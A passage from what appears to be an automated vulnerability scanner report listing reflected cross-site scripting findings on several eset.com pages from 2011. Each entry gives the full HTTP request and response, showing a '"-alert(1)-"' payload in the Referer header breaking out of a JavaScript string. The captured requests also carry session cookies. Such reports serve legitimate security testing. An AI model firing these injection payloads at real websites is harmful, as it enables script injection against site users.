s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=f8efc"-alert(1)-"85ec92afe8";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.269. http://www.eset.com/us/download/free-trial/nod32-antivirus [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4915b"-alert(1)-"48ff9162e36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/download/free-trial/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=4915b"-alert(1)-"48ff9162e36

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21464
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169070
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=4915b"-alert(1)-"48ff9162e36";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.270. http://www.eset.com/us/download/free-trial/smart-security [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/download/free-trial/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a9d"-alert(1)-"f4bb3c9f35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/download/free-trial/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=99a9d"-alert(1)-"f4bb3c9f35

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21574
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169255
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Download";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=99a9d"-alert(1)-"f4bb3c9f35";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.271. http://www.eset.com/us/home [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3de70"-alert(1)-"aff7b074c41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=3de70"-alert(1)-"aff7b074c41

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18192
Date: Sun, 17 Apr 2011 14:15:46 GMT
X-Varnish: 1858169194
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>I
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=3de70"-alert(1)-"aff7b074c41";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.272. http://www.eset.com/us/home/compare-eset-to-competition [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/compare-eset-to-competition

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb46"-alert(1)-"bea4f5a8167 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/compare-eset-to-competition HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=3eb46"-alert(1)-"bea4f5a8167

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24659
Date: Sun, 17 Apr 2011 14:15:46 GMT
X-Varnish: 1858169234
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=3eb46"-alert(1)-"bea4f5a8167";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.273. http://www.eset.com/us/home/nod32-antivirus [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45768"-alert(1)-"5ab3639d88d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=45768"-alert(1)-"5ab3639d88d

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25489
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169293
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>N
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=45768"-alert(1)-"5ab3639d88d";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.274. http://www.eset.com/us/home/smart-security [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdaa1"-alert(1)-"a109434bb74 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=fdaa1"-alert(1)-"a109434bb74

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25578
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169311
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=fdaa1"-alert(1)-"a109434bb74";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.275. http://www.eset.com/us/online-scanner [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa10d"-alert(1)-"394143401d1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=fa10d"-alert(1)-"394143401d1

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=5si1qqo03relg5cpdnrm3fe981; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20733
Date: Sun, 17 Apr 2011 12:55:03 GMT
X-Varnish: 1857986391
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=fa10d"-alert(1)-"394143401d1";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.276. http://www.eset.com/us/online-scanner/run [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner/run

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87b2c"-alert(1)-"4bfc395c0f4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=87b2c"-alert(1)-"4bfc395c0f4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3923
Date: Sun, 17 Apr 2011 12:59:38 GMT
X-Varnish: 1857996580
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=87b2c"-alert(1)-"4bfc395c0f4";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.277. http://www.eset.com/us/partners [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c89"-alert(1)-"905792298ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=c4c89"-alert(1)-"905792298ce

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13874
Date: Sun, 17 Apr 2011 14:15:48 GMT
X-Varnish: 1858169361
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=c4c89"-alert(1)-"905792298ce";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.278. http://www.eset.com/us/partners/worldwide-partners [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners/worldwide-partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f790"-alert(1)-"2951c1a0ee7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/partners/worldwide-partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=9f790"-alert(1)-"2951c1a0ee7

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 23135
Date: Sun, 17 Apr 2011 14:15:50 GMT
X-Varnish: 1858169476
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9f790"-alert(1)-"2951c1a0ee7";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.279. http://www.eset.com/us/press-center [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/press-center

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7e3"-alert(1)-"3cfb654df82 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

